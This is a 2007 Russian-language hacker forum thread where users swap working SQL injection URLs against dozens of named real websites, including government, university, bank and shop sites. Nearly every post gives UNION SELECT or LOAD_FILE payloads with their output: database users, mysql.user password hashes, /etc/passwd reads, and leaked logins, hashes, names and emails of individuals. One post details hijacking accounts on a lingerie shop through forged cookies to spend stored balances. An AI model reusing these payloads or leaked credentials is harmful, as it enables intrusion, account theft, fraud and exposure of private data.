http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,column_name,5,6+from+INFORMATION_SCHEMA.colu mns+where+table_name=0x696e736964655f7573657273+li mit+8,1/*
pwd_recover
http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,column_name,5,6+from+INFORMATION_SCHEMA.colu mns+where+table_name=0x696e736964655f7573657273+li mit+10,1/*
вывод:
vk:03f2816875e3a59a:Хворостов Владимир Александрович:vladimir@khvorostov.ru: :
http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,concat(login,0x3a,pwd,0x3a,fio,0x3a,email,0x 3a,icq,0x3a,pwd_recover),5,6+from+inside_users+lim it+0,1/*
http://www.postbank.co.ke/index.php?do=payment&op=morepayments&id=-1+union+select+1,2,concat(user(),0x3a,version(),0x 3a,databas e()),4,5,6,7,8,9,10/*eriko@localhost.localdomain:4.0.20-log:postbank_skies
http://www.postbank.co.ke/index.php?do=payment&op=morepayments&id=-1+union+select+1,2,concat(user,0x3a,pass word) ,4,5,6,7,8,9,10+from+mysql.user/* root:4c03944b42669d53
http://www.postbank.co.ke/index.php?do=payment&op=morepayments&id=-1+union+select+1,2,LOAD_FILE(char(47,101,116,99,47 ,112,97,115,115, 119,100)),4,5,6,7,8,9,10/*
http://galileo.co.ke/pages.php?p=32&ID=-1+union+select+1,concat(u ser(),0x3a,version(),0x3a,database()),3/*admin@localhost:5.0.26-standard:galileo
http://galileo.co.ke/pages.php?p=32&ID=-1+union+select+1,LOAD_FILE(char(47,101,116,99,4 7,112,97,115,115,119,100)),3/*
http://galileo.co.ke/pages.php?p=32&ID=-1+union+select+u ser,2,password+from+mysql.user/* faida 760b91c75fd34769
http://www.landscrona.ru/articles/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(user(),0x3a, version(),0x3a,database()),10,11,12,13,14,15,16/* ultrspru_data@localhost:4.1.22-lk-log:ultrspru_data
http://www.d-kaz.com/reviews/review.php?id=-1+union+select+1,2,concat(user(),0x3a,version(),0x 3a,databa se()),4,5,6,7,8,9 ,10,11,12,13,14,15/* вывод в исходнике dkasman@localhost:4.0.27-log:dkasman
http://azinba.com/companies.php?letter=d&id=9999+union+select+1,2,3,concat(user(),0x3a,vers ion(),0x3a,database( )),5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21/* azinba@localhost:5.0.41-log:azinba_main
Termin@L
28.09.2007, 18:05
http://www.poly.edu/news/fullNews.php?id=9999+union+select+1,2,3,4,5,6,7/*
http://www.biodiversityscotland.gov.uk/pageType2.php?id=-1/**/union/**/select/**/1,version(),3,4,5,6/*&type=2&navID=92
http://www.buywithconfidence.gov.uk/tradeCategory.php?id=-1+union+select+1,2,3,4,5/*
Don Carlione
28.09.2007, 18:12
http://meteoprog.ua/table.php?cityid=-1+union+select+null/*
http://meteoprog.ua/table.php?cityid=-1+union+select+name+from+admin/*
http://smart.am/eng/view.php?name=servicessystem&id=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(versi on(), 0x 71),0x71),5,6,7/*
http://www.cpttm.org.mo/news_e.php?id=-1+union+select+1,2,3,4,aes_decrypt(aes_encrypt(ve rsion(),0 x71),0x71),6,7,8,9,10,11,12,13,14,15/*
http://www.panmacjc.org.mo/showTopic.php?id=-1+union+select+1,concat(user(),0x3a,version(),0x3a ,database()),3,4,5,6/*panmacjc_123456@localhost:5.0.19-standard:panmacjc_panmacjc
Давно нашел инъекцию на официальном сайте МакSим,
http://www.maxi-m.ru/news/?id=9999+union+select+1,concat(user(),0x3a,version (),0x3a,database()),3,4,5,6,7/*&c=htmlmaxi@localhost:4.1.22:maxi_sql
http://www.maxi-m.ru/news/?id=9999+union+select+1,2,3,4,(username,0x3a,user_ password,0x3a,user_email,0x3a,use r_icq),6,7+from+ php bb_users+limit+1,1 /*&c=html
на данный момент форум не работает =\\
http://www.razom.lviv.ua/index.php?cont=docs&did=-1+union+select+null,concat_ws(char(58),user,pass,n ame),null+from+users/*
yura:e1f6e27996ac4b5fde1dc6a836e21275:Юрій Васильович
.........
код:
http://www.combined.biz/portfolio_details.php?id=-195+union+select+1,2,concat_ws(0x3a,password,email _addr,user_name,password_hash,last_name,first_name ),4,5,6+from+user+limit+1,1/*
http://poderedomex.com/notas.asp?nota_id=1+or+1=(SELECT+TOP+1+nota_id+FRO M+a_nota)--
источник)
http://www.securitylab.ru/vulnerability/303771.php
http://www.hiltonfoundation.org/main.asp?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+ INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+ ('report','category_tbl','ceremony','comd_list','c onference','cyfd','DIY_TEMPCOMMAND_TABLE','dtprope rties','extension_tbl','filetype_tbl','font_tbl',' gaga_Commander_Tmp','GY_TmpTable','hyperlink_tbl', 'image_tbl','lulu','media_category_tbl'')--
Solide Snake
28.09.2007, 22:44
www.vega-tur.ru
http://www.vega-tur.ru/index.php?num=2-1+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,database()),5,6/*
vega_admin@localhost:4.1.22-standard:vega_news
http://www.gsmserver.com.ua/spares/show_spares.php?catid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,load_file('/home'),19,20,21,22,23,24/*
http://www.gsmserver.com.ua/spares/show_spares.php?catid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,load_file('/etc/passwd'),19,20,21,22,23,24/*
# $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $
фряха, читаем содержимое директорий, файлов
Don Carlione
29.09.2007, 00:46
Вот парочка скл иньекций:
http://www.motory.com.ua/news.phtml?id=-1+union+select+1,2,login,password+from+admin/*
http://www.tours.com.ua/base.phtml?id=-1+union+select%201,2,3,4,5,6,7,8,9,10+from+base/*
Don Carlione
29.09.2007, 00:55
Сори не выложил сразу вот еще одна ;)
http://www.ji-association.org/news.phtml?id=-1+union+select+111,222,333,444,555,666,777,888,999 ,10+from+users/*
код:
http://www.ovacia.com.ua/event.php?id=-16'+union+select+1,2,3,4,5,6,7,8,9,10+from+admin/*
Don Carlione
29.09.2007, 09:01
http://www.pharm-system.com/?page=archive&rubid=-1+union+select+777+from+users/*
http://www.lodka.com.ua/news.phtml?id=222+union+select+1,2,3,4+from+news/*
big_BRAT
29.09.2007, 11:06
что-то последнее время все "пошли" на рідну неньку - Украину :cool:
пароль в открытом виде /админка http://www.pokupai.mobi/admin/ /
http://www.pokupai.mobi/index.php?act=sub_cat&id_sub=16699'+uNioN+sElEct+1,2,3,concat(login,':', pass),5,6+from+admin/*
Сайт крупный со своей почтой, форумом, и тд /пс. этот сайт уже фигурировал в антибояне, но в другом скрипте http://wap.mobilnik.ua...../
http://mobilnik.ua/catalog/compare.php?id1=4021&id2=19956+unIOn+sELect+1,2,3,4,5,6,7,8,9,0,1,2,3,4 ,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,concat(username ,0x3a,password,0x3a,salt,0x3a,email,0x3a,usertitle ),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1, 2,3,4,5,6,7,8,9,0,1,2,3,4,5+from+mobilnik_forum.fo rum_user+where+usertitle=0xc0e4ece8ede8f1f2f0e0f2e ef0+limit+0,1/*
http://www.snna.gov.py/noticia.php?id=9999999/**/union/**/select/**/1,2,concat(user(),0x3a,version(),0x3a,database()), 4/*snna@localhost:4.1.20:snna
http://www.programaumbral.gov.py/eventos_ver.php?id=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,vers ion(),0x3a,database()),8,9/*pupusaid_admin@localhost:4.0.25-standard:pupusaid_umbral
http://www.seam.gov.py/gacetillas.php?id=-1+union+select+1,2,aes_decrypt(aes_encrypt(version (),0x71),0x71),4,5,6,7,8,9,10,11,12/* 4.1.12 usr_seam@localhost seam
http://www.seam.gov.py/gacetillas.php?id=-1+union+select+1,password,aes_decrypt(aes_encrypt( user,0x71),0x71),4,5,6,7,8,9,10,11,12+from+mysql.u ser+limit+2,2/*fflores:773359240eb9a1d9
http://www.seam.gov.py/gacetillas.php?id=-1+union+select+1,password,aes_decrypt(aes_encrypt( user,0x71),0x71),4,5,6,7,8,9,10,11,12+from+mysql.u ser+limit+3,3/*adm_seam:0504cab7628f6128
итд =\\\
Впервые вижу уязвимость в html скрипте 8),сам раскрутить не смог,может у кого получится ;)
код:
http://www.vakansii.com.ua/showArticleNames.html?id=24+order+by+2/*
и шоб не оффтопить вот ещё она. нераскрученная
http://www.ihrc.org.uk/show.php?id=650'
Cойдет?
http://www.ihrc.org.uk/show.php?id=-1+union+select+1,2,database(),version(),user(),5,6 ,7,8,9,10,11,12/*
Впервые вижу уязвимость в html скрипте 8),сам раскрутить не смог,может у кого получится ;)
код:
http://www.vakansii.com.ua/showArticleNames.html?id=24+order+by+2/*
Там третья версия:
http://www.vakansii.com.ua/showArticleNames.html?id=24+OR 1=IF(SUBSTRING(VERSION(),1,1)=3,1,0)/*
А в третьей версии ни подзапросов ни юниона нет... Можно если комуто совсем надо только подбирать ;)
http://www.miga.org/sitelevel2/level2.cfm?id=1069%27
Там Oracle. Я тут не рулю... :(
Constantine
29.09.2007, 21:04
Ув. господа требуются добровольцы для апгрейта антибояна. С 300 по 323 стр. Желающие добро пожаловать в осику 480596. Спасибо
http://gamers.eurogamer.net/giveaways.php?id=-8 UNION SELECT 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(' ',VERSION(),DATABASE(),USER()),'1'),'1'),4,5,6,7,8 ,9,10,11/*
4.1.13-standard-log : eurogamer : masterwww@192.168.1.3
KPOT_f!nd
30.09.2007, 02:11
http://www.hamo.es/es/news.php?id=-2+union+select+1,2,column_name,4,5,6,7,8,9+from+in formation_schema.columns/*
thinkpackaging.com Провайдер, регистрирует доменные имена и предоставляет хостинг =) п.с. хотел найти что-нибудь подходящее, дорого ибо =)
http://www.thinkpackaging.com/view_company.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18 ,19,20,version(),22,23,24+from+company/*
код:
http://goroskop.a.org.ua/?id=-12+union+select+1,2,CAST(concat_ws(0x3a,version(), user(),database())+AS+BINARY),4/*
http://www.endiama.co.ao/news.php?id=-1+union+select+1,2,3,4,aes_decrypt(aes_encr ypt (version(),0x 71),0x71)/*
http://www.endiama.co.ao/news.php?id=-1+union+selec t+1,2,p assword,4,5+from+users/*
http://newwebstudio.com/bg/Services.php?id=-1+union+select+1,2,AES_DECRY PT(AES_ENCRYPT(VE RSION(),0x71),0x71),4,5/* http://www.garantovany-dodavatel.com/www/forum_read.php?id=-1+union+select+1,2,3,4 ,concat (user(),0x3a,version(),0x 3a,database()),6/*
источник: http://www.xakep.ru/post/40386/default.asp
------------------------------------
ActiveKB Knowledgebase 2.x
------------------------------------
http://support.lexiconn.com/kb/index.php?ToDo=browse&catId=-10+union+select+1,LOAD_FILE(%200x2f6574632f7061737 37764),3,4,5,6,7+members/*
http://www.randomhouse.com/about/faq/index.php?ToDo=browse&catId=-20+union+select+1,password,user,4,5,6,7%20from%20m ysql.user/*
http://www.booklounge.ca/about/faq/index.php?ToDo=browse&catId=-10+union+select+1,password,user,4,5,6,7%20from%20m ysql.user/*
http://olseninvest.com/faq/index.php?ToDo=browse&catId=-10+union+select+1,LOAD_FILE(%200x2f6574632f7061737 37764),3,4,5,6,7%20from%20mysql.user/*
----------------------------------
http://www.lcn.biz/faq/index.php?ToDo=browse&catId=-10+union+select+1,user,password,4,5,6,7%20from%20m ysql.user/*
http://www.lcn.biz/faq/index.php?ToDo=browse&catId=-10+union+select+1,LOAD_FILE(0x2f6574632f7061737377 64),3,4,5,6,7%20from%20mysql.user/*
----------------------------------
http://www.fastsurf.com/faqs/index.php?ToDo=browse&catId=-10+union+select+1,password,username,4,5,6,7%20from %20user/*
http://www.jm-hohenems.at/index.php?id=-1+union+select+1,2,3,4,5,6,7,user,9+from+mysql.use r--&lang=1'
Помучал гугль на edu сервера, вывод:
Каждая пятая ссылка уязвима к SQL injection
Из этих ссылок на каждой второй легко провести SQL injection
bti.cornell.eduhttp://bti.cornell.edu/page.php?id=111' OR 1=IF(SUBSTRING(VERSION(),1,1)=3,1,0)/*3 версия мускуля
gmu.eduhttp://gmu.edu/cfa/calendar/eventlisting.php?id=-598' UNION SELECT 1,2,3,CONCAT_WS(':',VERSION(),USER(),DATABASE()),5 ,6,7,8,9,10,11,12,13,14,15,16,17/*4.0.24_Debian-10sarge2-log:public@jiju.gmu.edu:centerarts
www.bact.wisc.eduhttp://www.bact.wisc.edu/GradStudies/facultyListing.php?id=-25 UNION SELECT 1,CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()), 3,4,5,6,7,8,9,10,11/*4.1.22-log : viewTables@localhost : bactsite
wwwrsphysse.anu.edu.au (сразу на заметил что не edu сервер... и как раз пятая версия мускула :( )http://wwwrsphysse.anu.edu.au/nuclear/personnel.php?id=-50 UNION SELECT 1,2,3,4,5,6,CONCAT_WS(0x203A20,VERSION(),USER(),DA TABASE()),8,9,10,11,12,13,14,15,16,17,185.0.22 : nucleus_reader@rsphyweb.anu.edu.au : nucleus
www.ns.umich.eduhttp://www.ns.umich.edu/htdocs/releases/story.php?id=3125'Тут UPDATE
genealogy.math.ndsu.nodak.eduhttp://genealogy.math.ndsu.nodak.edu/id.php?id=18231'Не разобралсо
www.salk.eduhttp://www.salk.edu/faculty/faculty_details.php?id=-15'Вроде чето есть, не разобралсо
qt.exploratorium.eduhttp://qt.exploratorium.edu/cils/page.php?ID=15 UNION SELECT 1,2,3,4 /*У меня вывести ничего не получилось...
stanfordphotonics.stanford.eduhttp://stanfordphotonics.stanford.edu/calendar.event.php?id=53'При подборе столбцов с помощью GROUP BY 3 столбца а на UNION SELECT 1,2,3 выдает ошибку...
-----------------------------------------------
Зы нашел в два раза больше чем тут, но половина оказалась баяном :(
код:
http://pk.kiev.ua/i2index.php?id=-4'+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,id,lo gin,name,email,pass),9,10,11,12,13,14+from+users+l imit+0,1/*
администрация предупреждена об уязвимости
http://pk.kiev.ua/i2index.php?id=-4'+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,id,lo gin,name,email,pass),9,10,11,12,13,14+from+users+l imit+0,1/*
Пожалуйста! помогите найти админку
Блин, а где ты её искал то? http://pk.kiev.ua/admin/
Магазин эротичного белья Shirley.RU
Сама скуль:
http://shirley.ru/cat.php?id=3+and+1=0+union+select+1,2/*
Узнаем версию и юзверя:
http://shirley.ru/cat.php?id=3+and+1=0+union+select+concat_ws(0x3a,u ser(),version()),2/*
shir@localhost:5.0.33
Узнаем имена таблиц:
http://shirley.ru/cat.php?id=3+and+1=0+union+select+table_name,2+fro m+INFORMATION_SCHEMA.tables+limit+16,1/*
Интересные:
shir_balance
shir_cart_orders
shir_cart_orderitems
shir_cart_prod_assort
shir_opt_users
shir_session
shir_users
shir_users_new
Узнаем имена столбцов:
http://shirley.ru/cat.php?id=3+and+1=0+union+select+concat_ws(0x3a,t able_name,column_name),2+from+INFORMATION_SCHEMA.c olumns+where+table_name=0x736869725F7573657273+lim it+0,1/*
Интересное:
uid
uname
pass
email
Выводим uid,uname,pass
http://shirley.ru/cat.php?id=3+and+1=0+union+select+concat_ws(0x3a,u id,uname,pass),2+from+shir_users+limit+0,1/*
получаем идент:логин:мд5хэш
Регаемся:
http://shirley.ru/user.php?name=new_user
Заходим в свой акк, смотрим куки (они зашифрованы в base64). Декодируем и получаем идент:логин:md5хэш
дэкодируем и вставляем чужие данные. Обновляем страницу и смотрим, что мы под дргим акком
На многих акках есть баланс, при чем крупненький ;)
благодаря таблице shir_balance можно вывести балан и номер пользователя, а дальше сами думаем ;)
В общем заходим под акком и покупаем себе эротическое белье ;)
blackybr
01.10.2007, 16:00
edu&gov
http://www.y12.doe.gov/community/story.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat(char(64,64),convert(column_name+using+latin1) ,char(64,64))+from+information_schema.columns+wher e+table_name=0x416363657373+limit+0,1/*
http://teleslin.lbl.gov/mysql/parseRTML2.php?id=-1+union+select+version(),user(),database(),4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40/*
http://journalism.berkeley.edu/events/details.php?ID=31337+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,version(),14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43,44,45,46,47,48,49,50,51,52,53,54/*
http://www.gatech.edu/calendar/event.php?id=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30/*
http://www.coa.gatech.edu/news/event.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
http://auroraforum.stanford.edu/events.php?id=-1+union+select+1,2,3,4,5,convert(version()+using+l atin1),7,8,9,10,11,12,13,14,15,16/*
http://www.choices.edu/resources/detail.php?id=-1+union+select+1,convert(version()+using+latin1),3 ,4,5,6,7,8,9,10,11,12,13,14,15,6,17,18,19,20,21,22 ,23,24,25,26/*
http://dma.ucla.edu/people/faculty.php?ID=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12, 13,14,15,16/*
http://kmoddl.library.cornell.edu/resources.php?id=-1+union+select+11111111111111/*
http://cemcom.infosci.cornell.edu/people.php?uid=-1+union+select+1,version(),3,4,5,6,7,8,9/*
http://libguides.drury.edu/viewprofile.php?uid=-1+union+select+1,2,version(),4,5,6/*
http://academic.sfsu.edu/ar/at/otl/fully_online_det.php?uid=-1'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24/*
http://www.ccrc.uga.edu/world/personnel/templateperson.php?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26/*
http://pride.uoregon.edu/point.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,1 3,14,15,16,17,18,19,20/*
http://ets.berkeley.edu/AboutETS/Staff/profile.php?uid=-1+union+select+1,2,3,4,5,6,7,version(),9/*
http://forum.stanford.edu/research/profile.php?id=4015+and+ascii(substring(version(), 1,1))=0x35/*
http://www.valparaiso.edu/news/index.php?action=display&newsid=-1+union+select+1,2,3,4,5,6,7,8,9/*
http://eps.berkeley.edu/development/view_person.php?uid=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24/*
http://www.oit.duke.edu/help/service/details.php?uid=-1'+union+select+1,version(),3,4,5,6,7,8,9/*
http://dms.dartmouth.edu/faculty/facultydb/view.php?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,convert(ver sion()+using+latin1),13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,32,32,33,34,35,36,37,38/*
http://outcomes.web.arizona.edu/data.php?uid=-1+union+select+convert(table_name+using+latin1)+fr om+information_schema.tables+where+table_schema=0x 6f7574636f6d6573+limit+7,1/*
0nep@t0p
01.10.2007, 17:00
http://www1.dontsova.ru/
http://www1.dontsova.ru/view_news.php?id=-197'+union+select+1,2,3,4,5,user_pas sword,7,username,9,10,11,12, 13+from+phpbb_users+where+user_id=1+limit+1/*
http://mayonez.com/
http://mayonez.com/news.php?id=-22+union+select+1,2,VERSI ON(),4,5/*
http://www.srt.lv/lv/index.php?option=com_mambads&Itemid=0&func=detail&cacat=1&casb=1&caid=999/**/Union/**/select/**/1,2,3,4,5,concat(char(117,115,101,114,110,97,109,1 01,58),username,char(32,112,97,115,115,119,111,114 ,100,58),password),7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23%20from%20mos_users/*
KPOT_f!nd
01.10.2007, 23:12
http://www.communicationvalley.it/FilesProc/CryptoFileContent.php?id=-13+union+select+1,2,3,table_name,5,6,7+from+inform ation_schema.tables+limit+2,1/*
прикольный ответ от SQL сервера). Лимит в помощь)
http://www.lib.uwo.ca/news/view.php?id=-487'+union+select+1,table_name,3,4,5,6,7,8,9+from+ information_schema.tables+limit+23,1/*
http://www.lib.uwo.ca/news/view.php?id=-487'+union+select+1,username,3,4,5,6,7,8,9+from+us ers+limit+1,1/*
Раскрутите)
http://www.schleuderwelt.com/print.php?printpage='+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27/*
Раскрутите)
http://www.schleuderwelt.com/print.php?printpage='+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27/*
код:
http://www.schleuderwelt.com/print.php?printpage=-9999999'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,concat_ws(0x3a,version(),user( ),database()),21,22,23,24,25,26,27/*
Дальше сам ройся,я спать... :o
0nep@t0p
02.10.2007, 15:07
Секас ;)
http://www.lovemagia.ru/product_show.php?lid= 7&sid=-20+union+s elect+1/*
Версия - 4.0.26-log
http://www.bankpersonal.dp.ua
код:
http://www.bankpersonal.dp.ua/news.php3?action=details&news_id=-15+union+select+1,2,concat(table_name,0x3a,column_ name),4+from+information_schema.columns/*
код:
http://www.bankpersonal.dp.ua/news.php3?action=details&news_id=-15+union+select+1,2,concat_ws(0x3a,passw,login,nam e,id),4+from+job_catvip/* <--- это единственное интересное что я нашел,
а вот в этой ---> http://www.bankpersonal.dp.ua/news.php3?action=details&news_id=-15+union+select+1,2,concat(0x3a,passw,login,name,i d),4+from+bank_kiev.auth/* почему-то нет вывода :(
первый раз вижу вывод в такой форме :D
код:
http://www.profnavigator.ru/tmpl2.php?PN=doct.php&dout=text&dsubj=22&dtype=4&nid=-1608+union+select+concat_ws(0x3a,version(),user(), database()),2/* кто нить встречал такое???
Мну непонял чо сервак от него хочед! Вот вам на растерзание
PHP+MSSQL
http://www.super.md/?t=statall&id=0&time=3+OR+1=@@version--
Ошибка выполнения SQL запроса: statsGeneral 0xce8add383ab3a840178eb487785dc2f6,0,3 OR 1=@@version--,NULL,1,4096
Calcutta
03.10.2007, 08:54
http://www.ntu.org/main/page.php?PageID=-6+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7
4.0.20-standard-log:ntu:ntu@reasonb.srv.lexi.net
http://www.ntu.org/main/page.php?PageID=-6+union+select+1,concat_ws(0x3a,table_name,table_s chema),3,4,5,6,7+from+information_schema.tables+li mit+1,1/*
не выводит, хотя, по идее, должно.. раскрутит мож кто?
_http://www.nikita.ru/javagames/index.php?wrub=-422+union+select+1,AES_DECRYPT(AES_ENCRYPT(user(), 0x71),0x71),3,4,5/*
[53x]Shadow
03.10.2007, 17:30
www.softprom.com
http://www.softprom.com/products.phtml?subcategory_id=-71'+union+select+user(),2/*
user:root@localhost.rm1.softprom.ua
http://www.ntu.org/main/page.php?PageID=-6+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7
4.0.20-standard-log:ntu:ntu@reasonb.srv.lexi.net
http://www.ntu.org/main/page.php?PageID=-6+union+select+1,concat_ws(0x3a,table_name,table_s chema),3,4,5,6,7+from+information_schema.tables+li mit+1,1/*
не выводит, хотя, по идее, должно.. раскрутит мож кто?
сам же вывел версию ветки..откуда здесь information_schema.tables
groundhog
04.10.2007, 13:03
То есть ты просто заменил ключевые слова языка SQL на CHAR(...)? :)))) Жесть... Так нельзя делать! На то они и ключевые слова языка, они не могут быть заменены ничем, ни возвращаемым значением функции, ни значаением возвращаемым подзапросом и т.д. Он тебе лепит ошибку только потому, что у тебя ошибка в синтаксисе запроса. Если парсятся ключевые слова в параметре, то тут уже ты ничего не сделаешь. Получатся некие пасхальные яйца от la2.acrossworld.ru - вроде как инъекция есть, но реализовать её нельзя.
http://www.monitor.autosurf-invest.com/programs.php?m=details&id=-9'+union+select+1,2,3,4,concat(user(),0x3a,version (), 0x3a,database()),6,7,8/*xxx@88.214.192.26:4.0.26:evro
http://www.monitor.autosurf-invest.com/programs.php?m=details&id=-9'+union+select+1,2,3,4,5,concat(login,0x3a, mail),7,8+from+users/*http://www.salecap.com/order.php?action=buy&id=-1+union+select+1,concat(user(),0x3a, version(),0x3a,database()),3,4,5,6,7,8/*sale34re_dblogin@localhost:4.0.27-standard-log:sal
http://www.denezhki.com/ShowArticle.php?id=-1+union+select+1,2,concat(user(),0x3a,ve rsion(),0x3a,database()),4/*rublikicom@81.177.16.131:4.1.21:rublikicom_den
http://www.duniacyber.com/advertises_detail.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(u ser(),0x3a,ve rsion(),0x3a,database()),14,1 5,16,17,18/*cyber_admin@localhost:4.0.27-standard:cyber_dccsql
http://www.rusaero.aero/news/?id=-16'+union+select+1,111,122,133,144,user(),166,177, 18,1/*
http://cinememorial.com/Acteur_detail.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,concat(user(),0x3a,version(),0x3a,database()),17, 18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33/*cinememorial@localhost:4.1.19-log:cinememorial_db
http://www.effedieffe.com/interventizeta.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(user(),0x3 a,version(),0x3a,database()),11,12,13,14, 15,16,17,18,19/*¶metro=esteriFC1574_fdf01@81.88.49.8:4.1.22-standard-log:effedieffe_com_01
http://www.cre-es.com/monograficasdelegaciones/index.php?class=7&id=-1+union+select+1,concat(user(),0x 3a,version(),0x3a,database()),3,4,5,6,7/*hjdfbhersnbxnkdh@localhost:4.0.27-log:cre_datos
http://www.sergioabreu.com/adm/noticia.php?id=-1+union+select+1,2,concat(user(),0x3a,version(),0x 3 a,database()),4, 5,6,7,8,9,10/*abreu@linhost255.prod.mesa1.secureserver.net:4.0. 27-max-log:abreu
http://www.beaufortbooks.com/books.php?id=-1+union+select+1,2,aes_decrypt(aes_encrypt(version (),0x71),0x71),4,5, 6,7,8,9,10,11,12,13/*4.1.11-Debian_4sarge7-log
http://www.beaufortbooks.com/books.php?id=-1+union+select+1,username,password,4,5,6,7,8,9, 10,11,12,13+from+users+limit+0,1/*
mash: acbdeec8026b26b4bc94303dceb45dfe итд
http://www.schoolbytes.com/summary.php?id=-1+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database()),4,5,6,7,8,9,10,11,12/*schoolbytes@localhost:5.0.20-standard:schoolbytes
http://www.schoolbytes.com/summary.php?id=-1+union+select+1,2,concat(username,0x3a,password), 4,5,6,7,8,9,10,11,12+fro m+users+limit+0,1/*mike:test
http://pride.uoregon.edu/section.php?id=-999+union+select+1,2,3,4,version(),6/*
sulaspaka
05.10.2007, 04:59
помогите pаскрутит
http://24.delfi.lv/index.php?action=prod&aid=0&id='
Joker-jar
05.10.2007, 05:57
Вот тебе перебор:
http://24.delfi.lv/index.php?action=prod&aid=0&id=100)+and+1=1/*
http://24.delfi.lv/index.php?action=prod&aid=0&id=100)+and+1=0/*
А вот union:
http://24.delfi.lv/index.php?action=prod&aid=0&id=100)+union+select+char(0x61,0x6e,0x74,0x69,0x63 ,0x68,0x61,0x74)/*
(вывода нет, в файл не пробовал)
net.ua
http://politdigest.net.ua/details_news.php?page=370&id=-722+union+select+1,database(),3,concat(version(),0 x3a,user()),5,6,7,8,9,10,11,12/*
http://mignews.net.ua/akcent.php?id=-972+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7,8,9,10,11,12,13/*
http://mp3.gipershop.net.ua/descript.php?kodmob=-78+union+select+1,2,3,4,concat_ws(0x3a,version(),u ser(),database()),6,7,8,9,10/*
http://h.ua/art.php?id=-49257'+union+select+1,2,concat_ws(0x3a,id_admin,lo gin,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42,43,44,45,46,47,48+from+bann syst.bannsyst_admins/*
bakililar.az
http://www.bakililar.az/lenta/?id=-13033+union+select+1,2,3,4,concat_ws(char(58),vers ion(),user(),database()),6+from+news+--+
4.0.27-standard:bakilila_lenta@localhost:bakilila_lenta
freemp3.org.ua
http://www.freemp3.org.ua/news.php?id=-83+union+select+1,2,3,4,concat_ws(char(58),version (),user(),database()),6,7+from+news+--+
4.1.22-log:freemp3_slovo@goliaph:freemp3_slovo
advpro.ru
http://www.advpro.ru/news/company/?year=2006'+union+select+1,concat_ws(char(58),vers ion(),database(),user()),3,4+from+news+--+
4.1.20:u5107:advpro.ru@localhost
http://studyport.info/viewdetails.php?id=-2577+union+select+1,concat(username,0x3a,passwd,0x 3a,email,0x3a,phone),3,4,5,6,7,8,9,10,11,12,13,14+ from+user/*
inlanger
07.10.2007, 00:00
http://www.kino-ukraina.com.ua/news/?nid=-1'+union+select+1,2,3,database(),5,user()/*
вапсайт самого популярного телеканала украины
код:
http://wap.inter.ua/ru/utf/serials/?id=-9533+union+select+1,CAST(concat(version(),0x3a,use r())+AS+BINARY),3,CAST(database()+AS+BINARY),5/* четвертый мускул :(
http://www.alturspro.ru/index.php?page=99999'+UNION+SELECT+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16/* не могу подобрать таблицы кто поможет просто для интереса какие там таблицы есть
inlanger
07.10.2007, 13:06
